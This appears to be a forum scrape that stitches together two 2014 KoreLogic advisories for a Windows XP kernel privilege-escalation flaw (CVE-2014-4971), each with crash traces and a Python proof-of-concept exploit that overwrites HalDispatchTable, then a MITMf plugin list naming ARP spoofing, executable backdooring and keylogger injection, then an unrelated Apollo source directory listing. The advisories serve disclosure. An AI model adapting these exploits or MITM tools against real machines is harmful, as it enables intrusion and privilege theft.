ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 mqac!AC2QM+0x5d: b230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=???????? A write-what-where vulnerability can be leveraged to obtain escalated privileges. To do so, an attacker will need to allocate memory in userland that is populated with shellcode designed to find the Token for PID 4 (System) and then overwrite the token for its own process. By leveraging the vulnerability in MQAC it is then possible to overwrite the pointer at HalDispatchTable+0x4 with a pointer to our shellcode. Calling NtQueryIntervalProfile() will subsequently call HalDispatchTable+0x4, execute our shellcode, and elevate the privilege of the exploit process. 4. Mitigation and Remediation Recommendation None. A patch is not likely to be forthcoming from the vendor. 5. Credit This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc. 6. Disclosure Timeline 2014.04.28 - Initial contact; sent Microsoft report and PoC. 2014.04.28 - Microsoft acknowledges receipt of vulnerability report; states XP is no longer supported and asks if the vulnerability affects other versions of Windows. 2014.04.29 - KoreLogic asks Microsoft for clarification of their support policy for XP. 2014.04.29 - Microsoft says XP-only vulnerabilities will not be addressed with patches. 2014.04.29 - KoreLogic asks if Microsoft intends to address the vulnerability report. 2014.04.29 - Microsoft opens case to investigate the impact of the vulnerability on non-XP systems. 2014.05.06 - Microsoft asks again if this vulnerability affects non-XP systems. 2014.05.14 - KoreLogic informs Microsoft that the vulnerability report is for XP and other Windows versions have not been examined. 2014.06.11 - KoreLogic informs Microsoft that 30 business days have passed since vendor acknowledgement of the initial report. KoreLogic requests CVE number for the vulnerability, if there is one. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date. 2014.06.11 - Microsoft responds to KoreLogic that the vulnerability does not affect an "up-platform" product. Says they are investigating embedded platforms. Does not provide a CVE number or a disclosure date. 2014.06.30 - KoreLogic asks Microsoft for confirmation of their receipt of the updated PoC. Also requests that a CVE ID be issued to this vulnerability. 2014.07.02 - 45 business days have elapsed since Microsoft acknowledged receipt of the vulnerability report and PoC. 2014.07.07 - KoreLogic requests CVE from MITRE. 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to be identical to KL-001-2014-002 and issues CVE-2014-4971 for both vulnerabilities. 2014.07.18 - Public disclosure. 7. Proof of Concept #!/usr/bin/python2 # # KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation # Matt Bergin (KoreLogic / Smash the Stack) # CVE-2014-4971 # from ctypes import * from struct import pack from os import getpid,system from sys import exit EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0 # thanks to offsec for the concept # I re-wrote the code as to not fully insult them def getBase(name=None): retArray = c_ulong*1024 ImageBase = retArray() callback = c_int(1024) cbNeeded = c_long() EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded)) for base in ImageBase: driverName = c_char_p("\x00"*1024) GetDeviceDriverBaseNameA(base,driverName,48) if (name): if (driverName.value.lower() == name): return base else: return (base,driverName.value) return None handle = CreateFileA("\\\\.\\MQAC",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) print "[+] Handle \\\\.\\MQAC @ %s" % (handle) NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40) buf = "\x50\x00\x00\x00"+"\x90"*0x400 WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0))) WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0))) WriteProcessMemory(-1, 0x5000, "\xcc", 77, byref(c_int(0))) #Overwrite Pointer kBase,kVer = getBase() hKernel = LoadLibraryExA(kVer,0,1) HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable") HalDispatchTable -= hKernel HalDispatchTable += kBase HalDispatchTable += 0x4 print "[+] Kernel @ %s, HalDispatchTable @ %s" % (hex(kBase),hex(HalDispatchTable)) DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0) print "[+] HalDispatchTable+0x4 overwritten" CloseHandle(handle) NtQueryIntervalProfile(c_ulong(2),byref(c_ulong())) exit(0) The contents of this advisory are copyright(c) 2014 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt Sursa: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation ? Packet Storm
-
Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation Authored by Matthew Bergin A vulnerability within the BthPan module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. Microsoft Bluetooth Personal Area Networking version 5.1.2600.5512 on XP SP3 is affected. Title: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation Advisory ID: KL-001-2014-002 Publication Date: 2014-07-18 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt 1. Vulnerability Details Affected Vendor: Microsoft Affected Product: Bluetooth Personal Area Networking Affected Versions: 5.1.2600.5512 Platform: Microsoft Windows XP SP3 CWE Classification: CWE-123: Write-what-where Condition Impact: Privilege Escalation Attack vector: IOCTL CVE ID: CVE-2014-4971 2. Vulnerability Description A vulnerability within the BthPan module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. 3. Technical Description A userland process can create a handle into the BthPan device and subsequently make DeviceIoControlFile() calls into that device. During the IRP handler routine for 0x0012b814 the user provided OutputBuffer address is not validated. This allows an attacker to specify an arbitrary address and write (or overwrite) the memory residing at the specified address. This is classicaly known as a write-what-where vulnerability and has well known exploitation methods associated with it. A stack trace from our fuzzing can be seen below. In our fuzzing testcase, the specified OutputBuffer in the DeviceIoControlFile() call is 0xffff0000. STACK_TEXT: b1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b b1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7 b1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc b1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92 b1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3 b1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8 b1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25 b1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b b1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21 b1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b b1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8 b1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93 b1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48 b1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c b1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31 b1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70 b1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7 b1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a WARNING: Stack unwind information not available. Following frames may be wrong. Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' command shows the fault originating in the bthpan driver. FOLLOWUP_IP: bthpan!BthpanReqAdd+16b b272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565) Reviewing the TRAP_FRAME at the time of crash we can see IopCompleteRequest() copying data from InputBuffer into the OutputBuffer. InputBuffer is another parameter provided to the DeviceIoControlFile() function and is therefore controllable by the attacker. The edi register contains the invalid address provided during the fuzz testcase. TRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630) ErrCode = 00000002 eax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000 eip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010203 nt!IopCompleteRequest+0x92: 804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] A write-what-where vulnerability can be leveraged to obtain escalated privileges. To do so, an attacker will need to allocate memory in userland that is populated with shellcode designed to find the Token for PID 4 (System) and then overwrite the token for its own process. By leveraging the vulnerability in BthPan it is then possible to overwrite the pointer at HalDispatchTable+0x4 with a pointer to our shellcode. Calling NtQueryIntervalProfile() will subsequently call HalDispatchTable+0x4, execute our shellcode, and elevate the privilege of the exploit process. 4. Mitigation and Remediation Recommendation None. A patch is not likely to be forthcoming from the vendor. 5. Credit This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc. 6. Disclosure Timeline 2014.04.28 - Initial contact; sent Microsoft report and PoC. 2014.04.28 - Microsoft acknowledges receipt of vulnerability report; states XP is no longer supported and asks if the vulnerability affects other versions of Windows. 2014.04.29 - KoreLogic asks Microsoft for clarification of their support policy for XP. 2014.04.29 - Microsoft says XP-only vulnerabilities will not be addressed with patches. 2014.04.29 - KoreLogic asks if Microsoft intends to address the vulnerability report. 2014.04.29 - Microsoft opens case to investigate the impact of the vulnerability on non-XP systems. 2014.05.06 - Microsoft asks again if this vulnerability affects non-XP systems. 2014.05.14 - KoreLogic informs Microsoft that the vulnerability report is for XP and other Windows versions have not been examined. 2014.06.11 - KoreLogic informs Microsoft that 30 business days have passed since vendor acknowledgement of the initial report. KoreLogic requests CVE number for the vulnerability, if there is one. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date. 2014.06.11 - Microsoft informs KoreLogic that the vulnerability does not impact any "up-platform" products. Says they are investigating embedded platforms. Does not provide CVE number. 2014.06.24 - Microsoft contacts KoreLogic to say that they confused the report of this vulnerability with another and that they cannot reproduce the described behavior. Microsoft asks for an updated Proof-of-Concept, crash dumps or any further analysis of the vulnerability that KoreLogic can provide. 2014.06.25 - KoreLogic provides Microsoft with an updated Proof-of-Concept which demonstrates using the vulnerability to spawn a system shell. 2014.06.30 - KoreLogic asks Microsoft for confirmation of their receipt of the updated PoC. Also requests that a CVE ID be issued for this vulnerability. 2014.07.02 - 45 business days have elapsed since Microsoft acknowledged receipt of the vulnerability report and PoC. 2014.07.07 - KoreLogic requests CVE from MITRE. 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be identical to KL-001-2014-003 and issues CVE-2014-4971 for both vulnerabilities. 2014.07.18 - Public disclosure. 7. Proof of Concept #!/usr/bin/python2 # # KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation # Matt Bergin (KoreLogic / Smash the Stack) # CVE-2014-4971 # from ctypes import * from struct import pack from os import getpid,system from sys import exit EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0 # thanks to offsec for the concept # I re-wrote the code as to not fully insult them def getBase(name=None): retArray = c_ulong*1024 ImageBase = retArray() callback = c_int(1024) cbNeeded = c_long() EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded)) for base in ImageBase: driverName = c_char_p("\x00"*1024) GetDeviceDriverBaseNameA(base,driverName,48) if (name): if (driverName.value.lower() == name): return base else: return (base,driverName.value) return None handle = CreateFileA("\\\\.\\BthPan",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) if (handle == INVALID_HANDLE_VALUE): print "[!] Could not open handle to BthPan" exit(1) NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40) buf = "\xcc\xcc\xcc\xcc"+"\x90"*0x400 WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0))) WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0))) kBase,kVer = getBase() hKernel = LoadLibraryExA(kVer,0,1) HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable") HalDispatchTable -= hKernel HalDispatchTable += kBase HalDispatchTable += 0x4 DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0) CloseHandle(handle) NtQueryIntervalProfile(c_ulong(2),byref(c_ulong())) exit(0) The contents of this advisory are copyright(c) 2014 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt Sursa: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation ? Packet Storm
-
MITMf Framework for Man-In-The-Middle attacks Quick tutorial and examples at Trying to take the dum-dum out of security... This tool is completely based on sergio-proxy https://code.google.com/p/sergio-proxy/ and is an attempt to revive and update the project. Availible plugins: ArpSpoof - Redirect traffic using arp-spoofing BrowserProfiler - Attempts to enumerate all browser plugins of connected clients CacheKill - Kills page caching by modifying headers FilePwn - Backdoor executables being sent over http using bdfactory Inject - Inject arbitrary content into HTML content JavaPwn - Performs drive-by attacks on clients with out-of-date java browser plugins jskeylogger - Injects a javascript keylogger into clients webpages Replace - Replace arbitary content in HTML content SMBAuth - Evoke SMB challenge-response auth attempts Upsidedownternet - Flips images 180 degrees Sursa: https://github.com/byt3bl33d3r/MITMf
-
[TABLE] [TR] [TD][/TD] [TD]Parent Directory[/TD] [TD] [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AGC_BLOCK_TWO_SELF-CHECK.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 94K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ALARM_AND_ABORT.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 35K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ANGLFIND.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 98K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ASSEMBLY_AND_OPERATION_INFORMATION.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]175K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]AUTOMATIC_MANEUVERS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 83K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Apollo32.png[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]2.6K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]CM_BODY_ATTITUDE.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 49K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]CM_ENTRY_DIGITAL_AUTOPILOT.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]212K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]CONIC_SUBROUTINES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]301K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]CONTRACT_AND_APPROVALS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 13K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]CSM_GEOMETRY.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 64K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]DISPLAY_INTERFACE_ROUTINES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]242K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]DOWN-TELEMETRY_PROGRAM.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 81K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]DOWNLINK_LISTS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 76K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ENTRY_LEXICON.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 56K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ERASABLE_ASSIGNMENTS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]642K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]EXECUTIVE.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 82K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]EXTENDED_VERBS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]214K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]FIXED_FIXED_CONSTANT_POOL.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 48K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]FRESH_START_AND_RESTART.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]239K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]GIMBAL_LOCK_AVOIDANCE.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 14K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]GROUND_TRACKING_DETERMINATION_PROGRAM.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 34K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]IMU_CALIBRATION_AND_ALIGNMENT.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]226K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]IMU_COMPENSATION_PACKAGE.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 64K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]IMU_MODE_SWITCHING_ROUTINES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]169K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]INFLIGHT_ALIGNMENT_ROUTINES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 45K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]INTEGRATION_INITIALIZATION.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]188K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]INTER-BANK_COMMUNICATION.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 32K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]INTERPRETER.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]507K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]INTERPRETIVE_CONSTANTS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 12K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]INTERRUPT_LEAD_INS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 19K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]JET_SELECTION_LOGIC.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]155K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]KALCMANU_STEERING.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 45K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]KEYRUPT_UPRUPT.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 24K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]LATITUDE_LONGITUDE_SUBROUTINES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 49K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]LUNAR_AND_SOLAR_EPHEMERIDES_SUBROUTINES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 32K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]LUNAR_LANDMARK_SELECTION_FOR_CM.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]6.2K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]MAIN.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]296K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]MEASUREMENT_INCORPORATION.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 80K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]MYSUBS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 16K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ORBITAL_INTEGRATION.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]145K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]P11.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]149K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]P20-P25.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]579K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]P30-P37.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 95K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]P32-P33_P72-P73.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]218K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]P34-35_P74-75.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]275K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]P37_P70.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]313K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]P40-P47.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]395K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]P51-P53.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]347K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]P61-P67.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]192K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]P76.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 28K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]PHASE_TABLE_MAINTENANCE.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 66K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]PINBALL_GAME_BUTTONS_AND_LIGHTS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]653K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]PINBALL_NOUN_TABLES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]158K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]PLANETARY_INERTIAL_ORIENTATION.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 61K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]POWERED_FLIGHT_SUBROUTINES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 60K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]R30.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 87K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]R31.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 48K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]R60_62.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 64K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RCS-CSM_DAP_EXECUTIVE_PROGRAMS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 15K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RCS-CSM_DIGITAL_AUTOPILOT.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]164K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]REENTRY_CONTROL.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]242K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RESTARTS_ROUTINE.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 52K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RESTART_TABLES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 81K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RT8_OP_CODES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 56K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]S-BAND_ANTENNA_FOR_CM.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 24K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]SERVICER207.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]121K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]SERVICE_ROUTINES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 42K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]SINGLE_PRECISION_SUBROUTINES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 12K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]STABLE_ORBIT.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 68K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]STAR_TABLES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 27K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]SXTMARK.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]105K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]SYSTEM_TEST_STANDARD_LEAD_INS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 22K[/TD] [TD] 